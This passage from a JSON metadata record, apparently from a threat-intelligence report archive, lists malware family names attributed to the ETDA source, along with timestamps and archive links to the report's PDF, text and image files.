				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434732,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5974cd546fdb0aebbbbebbba06950740007ecc37.pdf",
		"text": "https://archive.orkl.eu/5974cd546fdb0aebbbbebbba06950740007ecc37.txt",
		"img": "https://archive.orkl.eu/5974cd546fdb0aebbbbebbba06950740007ecc37.jpg"
	}
}